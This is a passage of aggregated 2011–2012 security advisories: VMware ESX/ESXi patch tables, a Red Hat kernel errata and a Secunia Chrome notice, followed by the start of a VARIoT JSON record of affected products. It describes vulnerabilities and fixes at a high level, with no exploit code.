Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.1       ESX      ESX410-201201401-SG
ESX            4.0       ESX      patch pending
ESX            3.5       ESX      not applicable
  • hosted products are VMware Workstation, Player, ACE, Fusion.

b. ESX third party update for Service Console cURL RPM

The ESX Service Console (COS) curl RPM is updated to cURL-7.15.5.9
resolving a security issues.

The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CVE-2011-2192 to this issue.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.1       ESX      ESX410-201201402-SG
ESX            4.0       ESX      patch pending
ESX            3.5       ESX      not applicable

* hosted products are VMware Workstation, Player, ACE, Fusion.

c. ESX third party update for Service Console nspr and nss RPMs

The ESX Service Console (COS) nspr and nss RPMs are updated to
nspr-4.8.8-1.el5_7 and nss-3.12.10-4.el5_7 respectively resolving
a security issues.

A Certificate Authority (CA) issued fraudulent SSL certificates and
Netscape Portable Runtime (NSPR) and Network Security Services (NSS)
contain the built-in tokens of this fraudulent Certificate
Authority. This update renders all SSL certificates signed by the
fraudulent CA as untrusted for all uses.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.1       ESX      ESX410-201201404-SG
ESX            4.0       ESX      patch pending
ESX            3.5       ESX      not applicable

* hosted products are VMware Workstation, Player, ACE, Fusion.

d. ESX third party update for Service Console rpm RPMs

The ESX Service Console Operating System (COS) rpm packages are
updated to popt-1.10.2.3-22.el5_7.2, rpm-4.4.2.3-22.el5_7.2,
rpm-libs-4.4.2.3-22.el5_7.2 and rpm-python-4.4.2.3-22.el5_7.2
which fixes multiple security issues.

The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the names CVE-2010-2059 and CVE-2011-3378 to these issues.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.1       ESX      ESX410-201201406-SG
ESX            4.0       ESX      patch pending
ESX            3.5       ESX      not applicable

* hosted products are VMware Workstation, Player, ACE, Fusion.

e. ESX third party update for Service Console samba RPMs

The ESX Service Console Operating System (COS) samba packages are
updated to samba-client-3.0.33-3.29.el5_7.4,
samba-common-3.0.33-3.29.el5_7.4 and
libsmbclient-3.0.33-3.29.el5_7.4 which fixes multiple security
issues in the Samba client.

The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the names CVE-2010-0547, CVE-2010-0787, CVE-2011-1678,
CVE-2011-2522 and CVE-2011-2694 to these issues.

Note that ESX does not include the Samba Web Administration Tool
(SWAT) and therefore ESX COS is not affected by CVE-2011-2522 and
CVE-2011-2694.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.1       ESX      ESX410-201201407-SG
ESX            4.0       ESX      patch pending
ESX            3.5       ESX      not applicable

* hosted products are VMware Workstation, Player, ACE, Fusion.

f. ESX third party update for Service Console python package

The ESX Service Console (COS) python package is updated to
2.4.3-44 which fixes multiple security issues.

The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the names CVE-2009-3720, CVE-2010-3493, CVE-2011-1015 and
CVE-2011-1521 to these issues.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.1       ESX      ESX410-201201405-SG
ESX            4.0       ESX      patch pending
ESX            3.5       ESX      not applicable

* hosted products are VMware Workstation, Player, ACE, Fusion.

g. ESXi update to third party component python

The python third party library is updated to python 2.5.6 which
fixes multiple security issues.

The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the names CVE-2009-3560, CVE-2009-3720, CVE-2010-1634,
CVE-2010-2089, and CVE-2011-1521 to these issues.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        any       Windows  not affected

hosted *       any       any      not affected

ESXi           5.0       ESXi     patch pending
ESXi           4.1       ESXi     ESXi410-201201401-SG
ESXi           4.0       ESXi     patch pending
ESXi           3.5       ESXi     patch pending

ESX            4.1       ESX      not affected
ESX            4.0       ESX      not affected
ESX            3.5       ESX      not affected

* hosted products are VMware Workstation, Player, ACE, Fusion.
  1. Solution

Please review the patch/release notes for your product and version and verify the checksum of your downloaded file.

VMware ESXi 4.1


ESXi410-201201401 http://downloads.vmware.com/go/selfsupport-download md5sum: BDF86F10A973346E26C9C2CD4C424E88
sha1sum: CC0B92869A9AAE4F5E0E5B81BEE109BCD7DA780F http://kb.vmware.com/kb/2009143 ESXi410-201201401 contains ESXi410-201201401-SG

VMware ESX 4.1


ESX410-201201001 http://downloads.vmware.com/go/selfsupport-download md5sum: 16DF9ACD3E74BCABC2494BC23AD0927F
sha1sum: 1066AE1436E1A75BA3D541AB65296CFB9AB7A5CC http://kb.vmware.com/kb/2009142

ESX410-201201001 contains ESX410-201201401-SG, ESX410-201201402-SG, ESX410-201201404-SG, ESX410-201201405-SG, ESX410-201201406-SG and ESX410-201201407-SG

  1. References

CVE numbers

--- COS Kernel --- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0726 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1078 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1079 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1080 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1093 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1163 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1166 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1170 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1171 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1172 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1494 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1495 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1577 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1763 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4649 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0695 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0711 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1044 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1182 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1573 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1576 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1593 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1745 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1746 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1776 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1936 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2022 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2213 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2492 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1780 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2525 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2689 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2482 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2491 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2495 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2517 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2519 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2901 --- COS cURL --- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2192 --- COS rpm --- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2059 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3378 --- COS samba --- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0547 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0787 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1678 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2522 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2694 --- COS python --- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3720 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3493 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1015 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1521 --- python library --- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3560 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3720 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1634 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2089 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1521


  1. Change log

2012-01-30 VMSA-2012-0001 Initial security advisory in conjunction with the release of patches for ESX 4.1 and ESXi 4.1 on 2012-01-30.


  1. Contact

E-mail list for product security notifications and announcements: http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce

This Security Advisory is posted to the following lists:

  • security-announce at lists.vmware.com
  • bugtraq at securityfocus.com
  • full-disclosure at lists.grok.org.uk

E-mail: security at vmware.com PGP key at: http://kb.vmware.com/kb/1055

VMware Security Advisories http://www.vmware.com/security/advisories

VMware security response policy http://www.vmware.com/support/policies/security_response.html

General support life cycle policy http://www.vmware.com/support/policies/eos.html

VMware Infrastructure support life cycle policy http://www.vmware.com/support/policies/eos_vi.html

Copyright 2012 VMware Inc. All rights reserved.

-----BEGIN PGP SIGNATURE----- Version: PGP Desktop 9.8.3 (Build 4028) Charset: utf-8

wj8DBQFPJ5DIDEcm8Vbi9kMRAnzCAKCmaAoDp49d61Mr1emzh/U0N8vbgACdFZk8 f2pLxi537s+ew4dvnYNWlJ8= =OAh4 -----END PGP SIGNATURE----- .

The Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. Relevant releases/architectures:

Red Hat Enterprise Linux EUS (v. 5.6 server) - i386, ia64, noarch, ppc, s390x, x86_64

  1. Description:

These packages contain the Linux kernel.

This update fixes the following security issues:

  • A flaw in the Stream Control Transmission Protocol (SCTP) implementation could allow a remote attacker to cause a denial of service by sending a specially-crafted SCTP packet to a target system. (CVE-2011-2482, Important)

If you do not run applications that use SCTP, you can prevent the sctp module from being loaded by adding the following to the end of the "/etc/modprobe.d/blacklist.conf" file:

blacklist sctp

This way, the sctp module cannot be loaded accidentally, which may occur if an application that requires SCTP is started. A reboot is not necessary for this change to take effect.

  • A flaw in the client-side NFS Lock Manager (NLM) implementation could allow a local, unprivileged user to cause a denial of service. (CVE-2011-2491, Important)

  • Flaws in the netlink-based wireless configuration interface could allow a local user, who has the CAP_NET_ADMIN capability, to cause a denial of service or escalate their privileges on systems that have an active wireless interface. (CVE-2011-2517, Important)

  • A flaw was found in the way the Linux kernel's Xen hypervisor implementation emulated the SAHF instruction. (CVE-2011-2901, Moderate)

  • /proc/[PID]/io is world-readable by default. Previously, these files could be read without any further restrictions. A local, unprivileged user could read these files, belonging to other, possibly privileged processes to gather confidential information, such as the length of a password used in a process. (CVE-2011-2495, Low)

Red Hat would like to thank Vasily Averin for reporting CVE-2011-2491, and Vasiliy Kulikov of Openwall for reporting CVE-2011-2495.

This update also fixes the following bugs:

  • On Broadcom PCI cards that use the tg3 driver, the operational state of a network device, represented by the value in "/sys/class/net/ethX/operstate", was not initialized by default. Consequently, the state was reported as "unknown" when the tg3 network device was actually in the "up" state. This update modifies the tg3 driver to properly set the operstate value. (BZ#744699)

  • A KVM (Kernel-based Virtual Machine) guest can get preempted by the host, when a higher priority process needs to run. When a guest is not running for several timer interrupts in a row, ticks could be lost, resulting in the jiffies timer advancing slower than expected and timeouts taking longer than expected. To correct for the issue of lost ticks, do_timer_tsc_timekeeping() checks a reference clock source (kvm-clock when running as a KVM guest) to see if timer interrupts have been missed. If so, jiffies is incremented by the number of missed timer interrupts, ensuring that programs are woken up on time. (BZ#747874)

  • When a block device object was allocated, the bd_super field was not being explicitly initialized to NULL. Previously, users of the block device object could set bd_super to NULL when the object was released by calling the kill_block_super() function. Certain third-party file systems do not always use this function, and bd_super could therefore become uninitialized when the object was allocated again. This could cause a kernel panic in the blkdev_releasepage() function, when the uninitialized bd_super field was dereferenced. Now, bd_super is properly initialized in the bdget() function, and the kernel panic no longer occurs. (BZ#751137)

  • Solution:

Users should upgrade to these updated packages, which contain backported patches to resolve these issues. The system must be rebooted for this update to take effect.

Before applying this update, make sure all previously-released errata relevant to your system have been applied.

This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/kb/docs/DOC-11259

To install kernel packages manually, use "rpm -ivh [package]". Do not use "rpm -Uvh" as that will remove the running kernel binaries from your system. You may use "rpm -e" to remove old kernels after determining that the new kernel functions properly on your system. Bugs fixed (http://bugzilla.redhat.com/):

709393 - CVE-2011-2491 kernel: rpc task leak after flock()ing NFS share 714867 - CVE-2011-2482 kernel: sctp dos 716825 - CVE-2011-2495 kernel: /proc/PID/io infoleak 718152 - CVE-2011-2517 kernel: nl80211: missing check for valid SSID size in scan operations 718882 - CVE-2011-2519 kernel: xen: x86_emulate: fix SAHF emulation 728042 - CVE-2011-2901 kernel: xen: off-by-one shift in x86_64 __addr_ok()

  1. Package List:

Red Hat Enterprise Linux EUS (v. 5.6 server):

Source: kernel-2.6.18-238.31.1.el5.src.rpm

i386: kernel-2.6.18-238.31.1.el5.i686.rpm kernel-PAE-2.6.18-238.31.1.el5.i686.rpm kernel-PAE-debuginfo-2.6.18-238.31.1.el5.i686.rpm kernel-PAE-devel-2.6.18-238.31.1.el5.i686.rpm kernel-debug-2.6.18-238.31.1.el5.i686.rpm kernel-debug-debuginfo-2.6.18-238.31.1.el5.i686.rpm kernel-debug-devel-2.6.18-238.31.1.el5.i686.rpm kernel-debuginfo-2.6.18-238.31.1.el5.i686.rpm kernel-debuginfo-common-2.6.18-238.31.1.el5.i686.rpm kernel-devel-2.6.18-238.31.1.el5.i686.rpm kernel-headers-2.6.18-238.31.1.el5.i386.rpm kernel-xen-2.6.18-238.31.1.el5.i686.rpm kernel-xen-debuginfo-2.6.18-238.31.1.el5.i686.rpm kernel-xen-devel-2.6.18-238.31.1.el5.i686.rpm

ia64: kernel-2.6.18-238.31.1.el5.ia64.rpm kernel-debug-2.6.18-238.31.1.el5.ia64.rpm kernel-debug-debuginfo-2.6.18-238.31.1.el5.ia64.rpm kernel-debug-devel-2.6.18-238.31.1.el5.ia64.rpm kernel-debuginfo-2.6.18-238.31.1.el5.ia64.rpm kernel-debuginfo-common-2.6.18-238.31.1.el5.ia64.rpm kernel-devel-2.6.18-238.31.1.el5.ia64.rpm kernel-headers-2.6.18-238.31.1.el5.ia64.rpm kernel-xen-2.6.18-238.31.1.el5.ia64.rpm kernel-xen-debuginfo-2.6.18-238.31.1.el5.ia64.rpm kernel-xen-devel-2.6.18-238.31.1.el5.ia64.rpm

noarch: kernel-doc-2.6.18-238.31.1.el5.noarch.rpm

ppc: kernel-2.6.18-238.31.1.el5.ppc64.rpm kernel-debug-2.6.18-238.31.1.el5.ppc64.rpm kernel-debug-debuginfo-2.6.18-238.31.1.el5.ppc64.rpm kernel-debug-devel-2.6.18-238.31.1.el5.ppc64.rpm kernel-debuginfo-2.6.18-238.31.1.el5.ppc64.rpm kernel-debuginfo-common-2.6.18-238.31.1.el5.ppc64.rpm kernel-devel-2.6.18-238.31.1.el5.ppc64.rpm kernel-headers-2.6.18-238.31.1.el5.ppc.rpm kernel-headers-2.6.18-238.31.1.el5.ppc64.rpm kernel-kdump-2.6.18-238.31.1.el5.ppc64.rpm kernel-kdump-debuginfo-2.6.18-238.31.1.el5.ppc64.rpm kernel-kdump-devel-2.6.18-238.31.1.el5.ppc64.rpm

s390x: kernel-2.6.18-238.31.1.el5.s390x.rpm kernel-debug-2.6.18-238.31.1.el5.s390x.rpm kernel-debug-debuginfo-2.6.18-238.31.1.el5.s390x.rpm kernel-debug-devel-2.6.18-238.31.1.el5.s390x.rpm kernel-debuginfo-2.6.18-238.31.1.el5.s390x.rpm kernel-debuginfo-common-2.6.18-238.31.1.el5.s390x.rpm kernel-devel-2.6.18-238.31.1.el5.s390x.rpm kernel-headers-2.6.18-238.31.1.el5.s390x.rpm kernel-kdump-2.6.18-238.31.1.el5.s390x.rpm kernel-kdump-debuginfo-2.6.18-238.31.1.el5.s390x.rpm kernel-kdump-devel-2.6.18-238.31.1.el5.s390x.rpm

x86_64: kernel-2.6.18-238.31.1.el5.x86_64.rpm kernel-debug-2.6.18-238.31.1.el5.x86_64.rpm kernel-debug-debuginfo-2.6.18-238.31.1.el5.x86_64.rpm kernel-debug-devel-2.6.18-238.31.1.el5.x86_64.rpm kernel-debuginfo-2.6.18-238.31.1.el5.x86_64.rpm kernel-debuginfo-common-2.6.18-238.31.1.el5.x86_64.rpm kernel-devel-2.6.18-238.31.1.el5.x86_64.rpm kernel-headers-2.6.18-238.31.1.el5.x86_64.rpm kernel-xen-2.6.18-238.31.1.el5.x86_64.rpm kernel-xen-debuginfo-2.6.18-238.31.1.el5.x86_64.rpm kernel-xen-devel-2.6.18-238.31.1.el5.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package

  1. References:

https://www.redhat.com/security/data/cve/CVE-2011-2482.html https://www.redhat.com/security/data/cve/CVE-2011-2491.html https://www.redhat.com/security/data/cve/CVE-2011-2495.html https://www.redhat.com/security/data/cve/CVE-2011-2517.html https://www.redhat.com/security/data/cve/CVE-2011-2519.html https://www.redhat.com/security/data/cve/CVE-2011-2901.html https://access.redhat.com/security/updates/classification/#important

  1. Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2011 Red Hat, Inc. This fixes some weaknesses and vulnerabilities, which can be exploited by malicious, local users to disclose certain system information, cause a DoS (Denial of Service), and gain escalated privileges and by malicious, local users in a guest virtual machine and malicious people to cause a DoS.

Successful exploitation of this weakness requires that the host system is not using hardware assisted paging (HAP). ----------------------------------------------------------------------

The new Secunia Corporate Software Inspector (CSI) 5.0 Integrates with Microsoft WSUS & SCCM and supports Apple Mac OS X.

Get a free trial now and qualify for a special discount: http://secunia.com/vulnerability_scanning/corporate/trial/


TITLE: Google Chrome Multiple Vulnerabilities

SECUNIA ADVISORY ID: SA46308

VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/46308/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=46308

RELEASE DATE: 2011-10-06

DISCUSS ADVISORY: http://secunia.com/advisories/46308/#comments

AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)

http://secunia.com/advisories/46308/

ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS

https://ca.secunia.com/?page=viewadvisory&vuln_id=46308

ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING

http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/

DESCRIPTION: Multiple vulnerabilities have been reported in Google Chrome, which can be exploited by malicious people to bypass certain security restrictions and compromise a user's system.

1) A use-after-free error exists in text line box handling.

2) An error in the SVG text handling can be exploited to reference a stale font.

3) An error exists within cross-origin access handling associated with a window prototype.

4) Some errors exist within audio node handling related to lifetime and threading.

5) A use-after-free error exists in the v8 bindings.

6) An error when handling v8 hidden objects can be exploited to corrupt memory.

7) An error in the shader translator can be exploited to corrupt memory.

The vulnerabilities are reported in versions prior to 14.0.835.202.

PROVIDED AND/OR DISCOVERED BY: The vendor credits: 1, 2) miaubiz 3, 5, 6) Sergey Glazunov 4) Inferno, Google Chrome Security Team 7) Zhenyao Mo, Chromium development community

ORIGINAL ADVISORY: Google: http://googlechromereleases.blogspot.com/2011/10/stable-channel-update.html

OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/

DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/

EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/

EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/

EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/


About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.

Subscribe: http://secunia.com/advisories/secunia_security_advisories/

Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/

Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.


Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org


Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201312-0004",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": null,
        "trust": 1.4,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "xen",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "xen",
        "version": "3.3.0"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "5.0"
      },
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "5.0"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "5.0"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5 server"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5 client"
      },
      {
        "model": "hat enterprise linux eus 5.6.z server",
        "scope": null,
        "trust": 0.3,
        "vendor": "red",
        "version": null
      },
      {
        "model": "aura session manager sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1"
      },
      {
        "model": "conferencing standard edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "aura presence services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.1"
      },
      {
        "model": "proactive contact",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0"
      },
      {
        "model": "voice portal sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0"
      },
      {
        "model": "voice portal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "iq",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1.1"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2.3"
      },
      {
        "model": "voice portal sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0"
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.2"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xensource",
        "version": "3.0"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.1"
      },
      {
        "model": "aura communication manager utility services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1"
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "esx",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "4.1"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xensource",
        "version": "3.1.2"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xensource",
        "version": "3.1.1"
      },
      {
        "model": "aura messaging",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0.1"
      },
      {
        "model": "hat enterprise linux desktop client",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "red",
        "version": "5"
      },
      {
        "model": "communication server 1000m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "aura session manager sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "1.1"
      },
      {
        "model": "iq",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "aura presence services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1"
      },
      {
        "model": "voice portal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1.1"
      },
      {
        "model": "aura communication manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.3"
      },
      {
        "model": "communication server 1000m signaling server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "aura system platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "communication server 1000e signaling server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "communication server 1000e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "aura system platform sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "aura system platform sp2",
